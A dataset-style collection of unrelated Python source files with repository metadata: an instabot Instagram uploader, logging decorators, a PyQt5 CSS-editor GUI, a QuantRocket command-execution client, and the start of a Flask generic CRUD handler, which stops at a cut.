[
"MIT"
] | null | null | null |
from instabot import Bot
import os
import shutil
import time
# Dado un tweet (str) e imaxe (str '*.jpeg'), publica o contido en instagram
def upload(tweet, imaxe):
clean_up()
bot = Bot()
bot.login(username="usename", password="password")
time.sleep(1)
bot.upload_photo(imaxe, caption=tweet)
# ...
def clean_up():
dir = "../config"
remove_me = "imgs\img.jpg.REMOVE_ME"
# checking whether config folder exists or not
if os.path.exists(dir):
try:
# removing it so we can upload new image
shutil.rmtree(dir)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
if os.path.exists(remove_me):
src = os.path.realpath("imgs\img.jpg")
os.rename(remove_me, src)
| 23.848485
| 76
| 0.617535
| 112
| 787
| 4.276786
| 0.589286
| 0.066806
| 0.041754
| 0.058455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001704
| 0.25413
| 787
| 32
| 77
| 24.59375
| 0.81431
| 0.205845
| 0
| 0
| 0
| 0
| 0.118699
| 0.035772
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0.047619
| 0.190476
| 0
| 0.285714
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb29a12d8ace63ae0afef58e7d2a5734abf0e3c4
| 2,088
|
py
|
Python
|
memories/api/utils.py
|
marchelbling/memories-api
|
e82d6c6ae2b7873fc35ebb301fc073e3ef968a1e
|
[
"MIT"
] | null | null | null |
memories/api/utils.py
|
marchelbling/memories-api
|
e82d6c6ae2b7873fc35ebb301fc073e3ef968a1e
|
[
"MIT"
] | null | null | null |
memories/api/utils.py
|
marchelbling/memories-api
|
e82d6c6ae2b7873fc35ebb301fc073e3ef968a1e
|
[
"MIT"
] | null | null | null |
import time
import logging
from functools import wraps
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] [%(levelname)s] %(message)s')
def timehttp(endpoint):
@wraps(endpoint)
def timed(self, request, response):
start = time.time()
result = endpoint(self, request, response)
logging.info("{uri} => {status} {response} in {timing:.3f}s"
.format(uri=request.uri,
status=response.status,
response=response.body,
timing=time.time() - start))
return result
return timed
def timeit(func):
@wraps(func)
def timed(*args, **kwargs):
argument_names = func.func_code.co_varnames[:func.func_code.co_argcount]
arguments = args[:len(argument_names)]
defaults = func.func_defaults or ()
arguments += defaults[len(defaults) - (func.func_code.co_argcount - len(arguments)):]
params = zip(argument_names, arguments)
arguments = arguments[len(argument_names):]
if arguments: params.append(('args', arguments))
if kwargs: params.append(('kwargs', kwargs))
call = func.func_name + '(' + ', '.join('%s=%r' % p for p in params) + ')'
start = time.time()
result = func(*args, **kwargs)
logging.info("{call} = {result} [{timing:.3f}s]"
.format(call=call,
result=unicode(result, 'utf8', errors='ignore').encode('utf8'),
timing=time.time() - start))
return result
return timed
def safe_utf8(string):
def safe_decode(string):
try:
return unicode(string, 'utf8')
except UnicodeError:
try:
return unicode(string, 'latin1')
except UnicodeError:
return unicode(string, 'utf8', 'replace')
if string is None:
return string
if not isinstance(string, unicode):
string = safe_decode(string)
return string.encode('utf8')
| 33.677419
| 93
| 0.561782
| 220
| 2,088
| 5.263636
| 0.322727
| 0.034542
| 0.031088
| 0.036269
| 0.115717
| 0.07772
| 0.07772
| 0.07772
| 0.07772
| 0
| 0
| 0.00625
| 0.310345
| 2,088
| 61
| 94
| 34.229508
| 0.797917
| 0
| 0
| 0.235294
| 0
| 0
| 0.08477
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2abd56368d34ecbc07a95fe8f4a470ff486455
| 24,641
|
py
|
Python
|
cssedit/editor/gui_qt.py
|
albertvisser/cssedit
|
e17ed1b43a0e4d50bfab6a69da47b92cd3213724
|
[
"MIT"
] | null | null | null |
cssedit/editor/gui_qt.py
|
albertvisser/cssedit
|
e17ed1b43a0e4d50bfab6a69da47b92cd3213724
|
[
"MIT"
] | null | null | null |
cssedit/editor/gui_qt.py
|
albertvisser/cssedit
|
e17ed1b43a0e4d50bfab6a69da47b92cd3213724
|
[
"MIT"
] | null | null | null |
"""cssedit: PyQt specific stuff
"""
import sys
import os
import PyQt5.QtWidgets as qtw
import PyQt5.QtGui as gui
import PyQt5.QtCore as core
from .cssedit import parse_log_line, get_definition_from_file
class MainGui(qtw.QMainWindow):
"""Hoofdscherm van de applicatie
"""
def __init__(self, master, app, title='', pos=(0, 0), size=(800, 500)):
self.master = master
if not app:
selfcontained = True
self.app = qtw.QApplication(sys.argv)
else:
self.app = app
print('in csseditor.maingui, app=', self.app)
super().__init__()
self.set_window_title()
if self.master.app_iconame:
self.setWindowIcon(gui.QIcon(self.master.app_iconame))
offset = 40 if os.name != 'posix' else 10
self.move(pos[0] + offset, pos[1] + offset)
self.resize(size[0], size[1])
self.statusbar = self.statusBar()
self.tree = TreePanel(self)
self.setCentralWidget(self.tree)
def create_menu(self, menudata):
"""bouw het menu en de meeste toolbars op"""
menubar = self.menuBar()
self.menus = {} # we may need this if we need to do something with specific menus later
for item, data in menudata:
menu = menubar.addMenu(item)
self.menus[item] = menu
for menudef in data:
if not menudef:
menu.addSeparator()
continue
label, handler, shortcut, icon, info = menudef
if isinstance(handler, tuple): # TODO: find a nicer way
submenu = menu.addMenu(label)
for item in handler:
# define submenu options
pass
continue
if icon:
action = qtw.QAction(gui.QIcon(os.path.join(HERE, icon)), label,
self)
## if not toolbar_added:
## toolbar = self.addToolBar(item)
## toolbar.setIconSize(core.QSize(16, 16))
## toolbar_added = True
## toolbar.addAction(action)
else:
action = qtw.QAction(label, self)
## if item == menudata[3][0]:
## if label == '&Undo':
## self.undo_item = action
## elif label == '&Redo':
## self.redo_item = action
if shortcut:
action.setShortcuts([x for x in shortcut.split(",")])
## if info.startswith("Check"):
## action.setCheckable(True)
if info:
action.setStatusTip(info)
action.triggered.connect(handler)
# action.triggered.connect(handler) werkt hier niet
if label:
menu.addAction(action)
self.master.actiondict[label] = action
def just_show(self):
"""standalone aansturen
"""
self.show()
sys.exit(self.app.exec_())
def set_modality_and_show(self, modal):
"""blokkerend gedrag instellen als aangestuurd vanuit bv. Htmledit
"""
print('in csseditorgui.set_modality_and_show, modal is', modal)
modality = core.Qt.ApplicationModal if modal else core.Qt.NonModal
self.setWindowModality(modality)
self.show()
def show_message(self, text, title=""):
"show a message in a box with a title"
title = title or self.master.app_title
qtw.QMessageBox.information(self, title, text)
def show_statusmessage(self, text):
"set the message at the bottom of the window"
self.statusbar.showMessage(text)
def close(self):
"""reimplemented method from superclass
"""
self.master.close()
super().close()
def set_window_title(self, title=''):
"set the title for the GUI window"
title = title or self.master.app_title
self.setWindowTitle(title)
def set_waitcursor(self, on):
"set cursor to clock or back to default"
if on:
self.app.setOverrideCursor(gui.QCursor(core.Qt.WaitCursor))
else:
self.app.restoreOverrideCursor()
def show_save_dialog(self, start, filter):
"get name of file to save"
return qtw.QFileDialog.getSaveFileName(self, self.master.app_title, start, filter)[0]
def show_open_dialog(self, start, filter):
"get name of file to open"
return qtw.QFileDialog.getOpenFileName(self, self.master.app_title, start, filter)[0]
def get_input_text(self, prompt):
"get text from user input"
return qtw.QInputDialog.getText(self, self.master.app_title, prompt)
def get_input_choice(self, prompt, choices, editable=False):
"get user to choice from a list of options"
return qtw.QInputDialog.getItem(self, self.master.app_title, prompt, choices, editable)
def show_dialog(self, cls, *args):
"show and return the results of a dialog"
edt = cls(self, *args).exec_()
if edt == qtw.QDialog.Accepted:
return True, self.dialog_data
else:
return False, None
class TreePanel(qtw.QTreeWidget):
"Tree structure"
def __init__(self, parent):
self.parent = parent
super().__init__()
self.setColumnCount(2)
self.hideColumn(1)
self.headerItem().setHidden(True)
## self.setAcceptDrops(True)
## self.setDragEnabled(True)
self.setSelectionMode(self.SingleSelection)
## self.setDragDropMode(self.InternalMove)
## self.setDropIndicatorShown(True)
self.setUniformRowHeights(True)
def selectionChanged(self, newsel, oldsel):
"""wordt aangeroepen als de selectie gewijzigd is
de tekst van de oude selectie wordt in de itemdict geactualiseerd
en die van de nieuwe wordt erin opgezocht en getoond"""
# helaas zijn newsel en oldsel niet makkelijk om te rekenen naar treeitems
# self.parent.check_active()
# h = self.currentItem()
# self.parent.activate_item(h)
def dropEvent(self, event):
"""wordt aangeroepen als een versleept item (dragitem) losgelaten wordt over
een ander (dropitem)
Het komt er altijd *onder* te hangen als laatste item
deze methode breidt de Treewidget methode uit met wat visuele zaken
"""
# copied from DocTree but not implemented yet
# dragitem = self.selectedItems()[0]
# dragparent = dragitem.parent()
# dropitem = self.itemAt(event.pos())
# if not dropitem:
# # ## event.ignore()
# return
# qtw.QTreeWidget.dropEvent(self, event)
# count = self.topLevelItemCount()
# if count > 1:
# for ix in range(count):
# if self.topLevelItem(ix) == dragitem:
# self.takeTopLevelItem(ix)
# self.oldparent.insertChild(self.oldpos, dragitem)
# self.setCurrentItem(dragitem)
# break
# return
# self.parent.set_project_dirty(True)
# self.setCurrentItem(dragitem)
# dropitem.setExpanded(True)
super().dropEvent(event)
def mousePressEvent(self, event):
"""remember the current parent in preparation for "canceling" a dragmove
"""
# copied from DocTree but not implemented yet
# xc, yc = event.x(), event.y()
# item = self.itemAt(xc, yc)
# if item:
# self.oldparent, self.oldpos = self._getitemparentpos(item)
super().mousePressEvent(event)
def mouseReleaseEvent(self, event):
"for showing a context menu"
# copied from DocTree but not implemented yet
# if event.button() == core.Qt.RightButton:
# xc, yc = event.x(), event.y()
# item = self.itemAt(xc, yc)
# if item:
# self.create_popupmenu(item)
# return
super().mouseReleaseEvent(event)
def keyReleaseEvent(self, event):
"also for showing a context menu"
# copied from DocTree but not implemented yet
# if event.key() == core.Qt.Key_Menu:
# item = self.currentItem()
# self.create_popupmenu(item)
# return
super().keyReleaseEvent(event)
def create_popupmenu(self, item):
"""create a menu in the right place"""
# copied from DocTree but not implemented yet
# menu = qtw.QMenu()
# for action in self.parent.notemenu.actions():
# act = menu.addAction(action)
# if item == self.parent.root and action.text() in ('&Add', '&Delete',
# '&Forward', '&Back'):
# action.setEnabled(False)
# menu.addSeparator()
# for action in self.parent.treemenu.actions():
# menu.addAction(action)
# if item == self.parent.root:
# action.setEnabled(False)
# menu.exec_(self.mapToGlobal(self.visualItemRect(item).center()))
# if item == self.parent.root:
# for action in self.parent.notemenu.actions():
# if item == self.parent.root and action.text() in ('&Add', '&Delete',
# '&Forward', '&Back'):
# action.setEnabled(True)
# for action in self.parent.treemenu.actions():
# action.setEnabled(True)
def remove_root(self):
self.takeTopLevelItem(0)
def init_root(self):
self.root = qtw.QTreeWidgetItem()
self.root.setText(0, "(untitled)")
self.addTopLevelItem(self.root)
def set_root_text(self, text):
self.root.setText(0, text)
def get_root(self):
return self.root
def activate_rootitem(self):
self.setCurrentItem(self.root)
def set_activeitem(self, item):
self.activeitem = item
def set_focus(self):
self.setFocus()
def add_to_parent(self, titel, parent, pos=-1):
"""shortcut for new_treeitem + add_subitem
"""
titel = titel.rstrip()
new = self.new_treeitem(titel)
self.add_subitem(parent, new, pos)
return new
def setcurrent(self, item):
self.setCurrentItem(item)
def getcurrent(self):
return self.currentItem()
@classmethod
def new_treeitem(self, itemtext):
"""build new item for tree
"""
item = qtw.QTreeWidgetItem()
item.setText(0, itemtext)
item.setToolTip(0, itemtext)
return item
@classmethod
def add_subitem(self, parent, child, ix=-1):
"add a subnode to a node. If ix is provided, it should indicate a position"
if ix == -1:
parent.addChild(child)
else:
parent.insertChild(ix, child)
@classmethod
def remove_subitem(self, parent, ix):
"remove a subnode from a node. If ix is provided, it should indicate a position"
parent.takeChild(ix)
@classmethod
def get_subitems(self, item):
"returns a list of a tree item's children"
return [item.child(i) for i in range(item.childCount())]
@classmethod
def set_itemtext(self, item, itemtext):
"sets the text of a tree item"
item.setText(0, itemtext)
item.setToolTip(0, itemtext)
@classmethod
def get_itemtext(self, item):
"returns the text of a tree item"
return item.text(0)
@classmethod
def getitemparentpos(self, item):
"return parent of current item and sequential position under it"
root = item.parent()
if root:
pos = root.indexOfChild(item)
else:
pos = -1
return root, pos
@classmethod
def expand_item(self, item):
"show the item's subitems"
item.setExpanded(True)
@classmethod
def collapse_item(self, item):
"hide the item's subitems"
item.setExpanded(False)
class LogDialog(qtw.QDialog):
"Simple Log display"
text = "css definition that triggers this message:\n\n"
def __init__(self, parent, log):
self.parent = parent
super().__init__(parent)
self.setWindowTitle(self.parent.master.app_title + " - show log for current file")
## self.setWindowIcon(self.parent.app_icon)
txt = qtw.QLabel("Dubbelklik op een regel om de context "
"(definitie in de css) te bekijken")
self.lijst = qtw.QListWidget(self)
## self.lijst.setSelectionMode(gui.QAbstractItemView.SingleSelection)
self.lijst.addItems(log)
b1 = qtw.QPushButton("&Toon Context", self)
b1.clicked.connect(self.show_context)
b2 = qtw.QPushButton("&Klaar", self)
b2.clicked.connect(self.done)
vbox = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
hbox.addWidget(txt)
vbox.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addWidget(self.lijst)
vbox.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addWidget(b1)
hbox.addWidget(b2)
hbox.insertStretch(0, 1)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.setLayout(vbox)
self.resize(600, 480)
self.exec_()
def itemDoubleClicked(self, item):
"""handler for doubleclicking over a line
"""
self.show_context(item)
def show_context(self, item=None):
"""show full logline (in case it's been chopped off)
and the definition that triggered it
"""
# determine selected line in the list and get associated data
# import pdb; pdb.set_trace()
selected = item or self.lijst.currentItem()
y = parse_log_line(selected.text())
context = get_definition_from_file(self.parent.master.project_file, y.line, y.pos)
# pop up a box to show the data
title = self.parent.master.app_title + " - show context for log message"
qtw.QMessageBox.information(self, title, self.text + context)
def done(self, arg=None):
"""finish dialog
"""
super().done(0)
class TextDialog(qtw.QDialog):
"""dialoog om een ongedefinieerde tekst (bv. van een commentaar) weer te geven
d.m.v. een multiline tekst box
"""
def __init__(self, parent, title='', text=''): # , comment=False):
self._parent = parent
super().__init__(parent)
self.setWindowTitle(title)
self.resize(440, 280)
vbox = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
self.data_text = qtw.QTextEdit(self)
## self.data_text.resize(440, 280)
hbox.addSpacing(50)
self.data_text.setText(text)
hbox.addWidget(self.data_text)
hbox.addSpacing(50)
vbox.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Save', self)
btn.clicked.connect(self.on_ok)
btn.setDefault(True)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Cancel', self)
btn.clicked.connect(self.on_cancel)
hbox.addWidget(btn)
hbox.addStretch()
vbox.addLayout(hbox)
self.setLayout(vbox)
self.data_text.setFocus()
def on_cancel(self):
"""callback for cancel button (should be replaced by connecting to reject?)
"""
super().reject()
def on_ok(self):
"""confirm changed text
"""
self._parent.dialog_data = str(self.data_text.toPlainText())
super().accept()
class GridDialog(qtw.QDialog):
"""dialoog om stijl definities voor een (groep van) selector(s) op te voeren
of te wijzigen
"""
def __init__(self, parent, title='', itemlist=None): # , comment=False):
self._parent = parent
super().__init__(parent)
self.setWindowTitle(title)
## self.setWindowIcon(gui.QIcon(os.path.join(PPATH,"ashe.ico")))
vbox = qtw.QVBoxLayout()
sbox = qtw.QFrame()
sbox.setFrameStyle(qtw.QFrame.Box)
box = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
hbox.addStretch()
hbox.addWidget(qtw.QLabel("Items in table:", self))
hbox.addStretch()
box.addLayout(hbox)
hbox = qtw.QHBoxLayout()
self.attr_table = qtw.QTableWidget(self)
## self.attr_table.resize(540, 340)
self.attr_table.setColumnCount(2)
self.attr_table.setHorizontalHeaderLabels(['property', 'value']) # alleen zo te wijzigen
hdr = self.attr_table.horizontalHeader()
## hdr.setMinimumSectionSize(340)
hdr.resizeSection(0, 102)
hdr.resizeSection(1, 152)
hdr.setStretchLastSection(True)
self.attr_table.verticalHeader().setVisible(False)
self.attr_table.setTabKeyNavigation(False)
## self.attr_table.SetColSize(1, tbl.Size[0] - 162) # 178) # 160)
if itemlist is not None:
for attr, value in itemlist:
idx = self.attr_table.rowCount()
self.attr_table.insertRow(idx)
item = qtw.QTableWidgetItem(attr)
self.attr_table.setItem(idx, 0, item)
item = qtw.QTableWidgetItem(value)
self.attr_table.setItem(idx, 1, item)
else:
self.row = -1
## hbox.addStretch()
hbox.addWidget(self.attr_table)
## hbox.addStretch()
box.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addSpacing(50)
btn = qtw.QPushButton('&Add Item', self)
btn.clicked.connect(self.on_add)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Delete Selected', self)
btn.clicked.connect(self.on_del)
hbox.addWidget(btn)
hbox.addSpacing(50)
box.addLayout(hbox)
sbox.setLayout(box)
vbox.addWidget(sbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Save', self)
btn.clicked.connect(self.on_ok)
btn.setDefault(True)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Cancel', self)
btn.clicked.connect(self.on_cancel)
hbox.addWidget(btn)
vbox.addLayout(hbox)
hbox.addStretch()
self.setLayout(vbox)
## def on_resize(self, evt=None):
## self.attr_table.SetColSize(1, self.attr_table.GetSize()[0] - 162) # 178) # 160)
## self.attr_table.ForceRefresh()
def on_add(self):
"""property toevoegen:
in dit geval hoef ik alleen maar een lege regel aan de tabel toe te voegen
"""
## self.attr_table.setFocus()
num = self.attr_table.rowCount()
self.attr_table.setRowCount(num + 1)
## self.attr_table.insertRow(idx) # waarom niet addRow?
## self.attr_table.setCurrentCell(idx, 0)
def on_del(self):
"""attribuut verwijderen
"""
ok = qtw.QMessageBox.question(self, 'Delete row from table', 'Are you sure?',
qtw.QMessageBox.Ok | qtw.QMessageBox.Cancel,
qtw.QMessageBox.Ok)
if ok == qtw.QMessageBox.Ok:
self.attr_table.removeRow(self.attr_table.currentRow())
def on_cancel(self):
"""callback for cancel button (should be replaced by connecting to reject?)
"""
## qtw.QDialog.done(self, qtw.QDialog.Rejected)
super().reject()
def on_ok(self):
"""controle bij OK aanklikken
"""
proplist = []
for i in range(self.attr_table.rowCount()):
name_item = self.attr_table.item(i, 0)
value_item = self.attr_table.item(i, 1)
if not name_item or not value_item:
qtw.QMessageBox.information(self, "Can't continue",
'Not all values are entered and confirmed')
return
proplist.append((str(name_item.text()), str(value_item.text())))
self._parent.dialog_data = proplist
## qtw.QDialog.done(self, qtw.QDialog.Accepted)
super().accept()
class ListDialog(qtw.QDialog):
"""dialoog om een list type property toe te voegen of te wijzigen
"""
def __init__(self, parent, title='', itemlist=None): # , comment=False):
self._parent = parent
super().__init__(parent)
self.setWindowTitle(title)
self.is_rules_node = "'rules'" in title
vbox = qtw.QVBoxLayout()
sbox = qtw.QFrame()
sbox.setFrameStyle(qtw.QFrame.Box)
box = qtw.QVBoxLayout()
hbox = qtw.QHBoxLayout()
hbox.addStretch()
hbox.addWidget(qtw.QLabel("Items in list:", self))
hbox.addStretch()
vbox.addLayout(hbox)
self.list = qtw.QListWidget(self)
if itemlist is not None:
self.list.addItems([self._parent.tree.get_itemtext(x) for x in itemlist])
hbox = qtw.QHBoxLayout()
hbox.addSpacing(50)
hbox.addWidget(self.list)
hbox.addSpacing(50)
box.addLayout(hbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Add Item', self)
btn.clicked.connect(self.on_add)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Edit Selected', self)
btn.clicked.connect(self.on_edit)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Delete Selected', self)
btn.clicked.connect(self.on_del)
hbox.addWidget(btn)
hbox.addStretch()
box.addLayout(hbox)
sbox.setLayout(box)
vbox.addWidget(sbox)
hbox = qtw.QHBoxLayout()
hbox.addStretch()
btn = qtw.QPushButton('&Save', self)
btn.clicked.connect(self.on_ok)
btn.setDefault(True)
hbox.addWidget(btn)
btn = qtw.QPushButton('&Cancel', self)
btn.clicked.connect(self.on_cancel)
hbox.addWidget(btn)
vbox.addLayout(hbox)
hbox.addStretch()
self.setLayout(vbox)
def on_add(self):
"item toevoegen"
if self.is_rules_node:
ruletypes = sorted([(x, y[0]) for x, y in ed.RTYPES.items()],
key=lambda item: item[1])
options = [x[1] for x in ruletypes]
text, ok = qtw.QInputDialog.getItem(
self, self._parent.app_title, "Choose type for this rule", options,
editable=False)
else:
text, ok = qtw.QInputDialog.getText(
self, 'Add item to list', 'Enter text for this item')
self.list.addItem(text)
def on_edit(self):
"item wijzigen"
current = self.list.currentItem()
oldtext = current.text()
if self.is_rules_node:
ruletypes = sorted([(x, y[0]) for x, y in ed.RTYPES.items()],
key=lambda item: item[1])
options = [x[1] for x in ruletypes]
current_index = options.index(oldtext) if oldtext else 0
text, ok = qtw.QInputDialog.getItem(
self, self._parent.app_title, "Choose type for this rule", options,
current_index, editable=False)
else:
text, ok = qtw.QInputDialog.getText(
self, 'Edit list item', 'Enter text for this item:', text=oldtext)
if ok and text != oldtext:
current.setText(text)
def on_del(self):
"item verwijderen"
ok = qtw.QMessageBox.question(self, 'Delete item from list', 'Are you sure?',
qtw.QMessageBox.Ok | qtw.QMessageBox.Cancel,
qtw.QMessageBox.Ok)
if ok == qtw.QMessageBox.Ok:
self.list.takeItem(self.list.currentRow())
def on_cancel(self):
"""callback for cancel button (should be replaced by connecting to reject?)
"""
## qtw.QDialog.done(self, qtw.QDialog.Rejected)
super().reject()
def on_ok(self):
"""bij OK: de opgebouwde list via self.dialog_data doorgeven
aan het mainwindow
"""
list_data = []
for row in range(self.list.count()):
list_data.append(str(self.list.item(row).text()))
self._parent.dialog_data = list_data
## qtw.QDialog.done(self, qtw.QDialog.Accepted)
super().accept()
| 35.302292
| 97
| 0.582363
| 2,820
| 24,641
| 5.008511
| 0.203546
| 0.023364
| 0.023931
| 0.017134
| 0.386576
| 0.348556
| 0.310394
| 0.268267
| 0.241008
| 0.217077
| 0
| 0.008041
| 0.308591
| 24,641
| 697
| 98
| 35.352941
| 0.820978
| 0.25628
| 0
| 0.401345
| 0
| 0
| 0.078799
| 0.001867
| 0
| 0
| 0
| 0.001435
| 0
| 1
| 0.130045
| false
| 0.002242
| 0.013453
| 0.004484
| 0.190583
| 0.004484
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2bb261a73c74317e9f4c04091925e5a2fa1f5e
| 2,199
|
py
|
Python
|
quantrocket/satellite.py
|
Jay-Jay-D/quantrocket-client
|
b70ac199382d22d56fad923ca2233ce027f3264a
|
[
"Apache-2.0"
] | null | null | null |
quantrocket/satellite.py
|
Jay-Jay-D/quantrocket-client
|
b70ac199382d22d56fad923ca2233ce027f3264a
|
[
"Apache-2.0"
] | null | null | null |
quantrocket/satellite.py
|
Jay-Jay-D/quantrocket-client
|
b70ac199382d22d56fad923ca2233ce027f3264a
|
[
"Apache-2.0"
] | 1
|
2019-06-12T11:34:27.000Z
|
2019-06-12T11:34:27.000Z
|
# Copyright 2017 QuantRocket - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from quantrocket.houston import houston
from quantrocket.cli.utils.output import json_to_cli
from quantrocket.cli.utils.files import write_response_to_filepath_or_buffer
def execute_command(service, cmd, return_file=None, filepath_or_buffer=None):
"""
Execute an abitrary command on a satellite service and optionally return a file.
Parameters
----------
service : str, required
the service name
cmd: str, required
the command to run
return_file : str, optional
the path of a file to be returned after the command completes
filepath_or_buffer : str, optional
the location to write the return_file (omit to write to stdout)
Returns
-------
dict or None
None if return_file, otherwise status message
"""
params = {}
if not service:
raise ValueError("a service is required")
if not cmd:
raise ValueError("a command is required")
params["cmd"] = cmd
if return_file:
params["return_file"] = return_file
if not service.startswith("satellite"):
raise ValueError("service must start with 'satellite'")
response = houston.post("/{0}/commands".format(service), params=params, timeout=60*60*24)
houston.raise_for_status_with_json(response)
if return_file:
filepath_or_buffer = filepath_or_buffer or sys.stdout
write_response_to_filepath_or_buffer(filepath_or_buffer, response)
else:
return response.json()
def _cli_execute_command(*args, **kwargs):
return json_to_cli(execute_command, *args, **kwargs)
| 32.820896
| 93
| 0.71578
| 305
| 2,199
| 5.02623
| 0.4
| 0.052185
| 0.073059
| 0.020874
| 0.10698
| 0.071755
| 0
| 0
| 0
| 0
| 0
| 0.008601
| 0.206912
| 2,199
| 66
| 94
| 33.318182
| 0.870413
| 0.473852
| 0
| 0.083333
| 0
| 0
| 0.105312
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.166667
| 0.041667
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2ea9cb95f216543b39462cef45459a422c0631
| 12,367
|
py
|
Python
|
blog_server/app/comm/GeneralOperate.py
|
szhu9903/flask-react-blog
|
b1939a5d95e0084a82c230f2a20a9b197d2eef46
|
[
"MIT"
] | 2
|
2022-03-12T14:51:42.000Z
|
2022-03-25T13:20:16.000Z
|
blog_server/app/comm/GeneralOperate.py
|
szhu9903/flask-react-blog
|
b1939a5d95e0084a82c230f2a20a9b197d2eef46
|
[
"MIT"
] | 7
|
2022-03-19T02:17:54.000Z
|
2022-03-28T10:12:52.000Z
|
blog_server/app/comm/GeneralOperate.py
|
szhu9903/flask-react-blog
|
b1939a5d95e0084a82c230f2a20a9b197d2eef46
|
[
"MIT"
] | 1
|
2022-03-25T13:20:28.000Z
|
2022-03-25T13:20:28.000Z
|
import copy
from flask import g
from app.comm.TableModule import TableModule
from app.comm.SqlExecute import SqlExecute
from app.unit_config import default_result, default_limit_size, depth_post_map
class GeneralOperate(object):
def __init__(self, module:TableModule):
self.module = module
# 请求参数检查链
self.get_deal_func_link = []
self.post_deal_func_link = []
self.put_deal_func_link = []
self.delete_deal_func_link = []
self.init_check_func_link()
# 初始化请求处理链
def init_check_func_link(self):
self.get_deal_func_link.extend([
self.check_get_permissions,
self.check_view_param,
self.check_pagination_param,
self.before_deal_get,
self.deal_get_data,
self.after_deal_get,
])
self.post_deal_func_link.extend([
self.check_operation_permissions,
self.check_request_data,
self.check_column_data,
self.before_deal_post,
self.deal_post_data,
self.after_deal_post,
])
self.put_deal_func_link.extend([
self.check_operation_permissions,
self.check_request_data,
self.check_unique_record,
self.check_column_data,
self.before_deal_put,
self.deal_put_data,
self.after_deal_put,
])
self.delete_deal_func_link.extend([
self.check_operation_permissions,
self.check_unique_record,
self.before_deal_delete,
self.deal_delete_data,
self.after_deal_delete,
])
# 通用 - 初始化请求参数解析
def init_general_data(self, request):
g.args_data = request.args.to_dict() # url参数
g.is_continue_exec = True # 检查链执行结果
if request.method in ["POST", "PUT"]:
g.json_data = request.json
g.view_args = request.view_args # 动态url路径参数
# 处理GET请求
def deal_get_method(self, request):
# 初始化参数
self.init_general_data(request)
# 执行处理函数链
for deal_func in self.get_deal_func_link:
deal_func()
# 出现异常退出检查链
if not g.is_continue_exec:
break
return g.result
# 处理GET请求 -> 检查权限
def check_get_permissions(self):
return
# 处理GET请求 -> 检查视图参数
def check_view_param(self):
view = g.args_data.get("view")
if view:
if (not self.module.view_list) or (view not in self.module.view_list):
g.is_continue_exec = False
g.result['message'] = f"view({view}):视图不存在! "
# 处理GET请求 -> 检查分页参数
def check_pagination_param(self):
pagination = g.args_data.get("pagination")
if pagination:
page_index, page_size = pagination.split(',')
if (not page_index.isdigit()) and (not page_size.isdigit()):
g.is_continue_exec = False
g.result['message'] = f"pagination({pagination}):分页数据错误,参考格式:index,size! "
# 处理GET请求 -> 执行get获取数据前操作
def before_deal_get(self):
return
# 处理GET请求 -> 执行get获取数据
def deal_get_data(self):
# 获取总数
self.filter_str, self.filter_args = self.get_filter_str()
total_count = self.query_total_count()
if not g.is_continue_exec:
g.result['message'] = '获取数据量失败!'
return
g.result['total_count'] = total_count
# 获取查询结果集
data = self.query_data()
if not g.is_continue_exec:
g.result['message'] = '获取结果集失败!'
return
g.result['data'] = data
# 处理GET请求 -> 执行get获取数据 -> 查询数据总量
def query_total_count(self):
view = g.args_data.get('view')
if view:
count_query = self.module.views_query[view]['sql_query_count']
else:
count_query = self.module.sql_count_default
count_query = f'{count_query} {self.filter_str}'
total_count = SqlExecute.query_sql_data(count_query, self.filter_args)
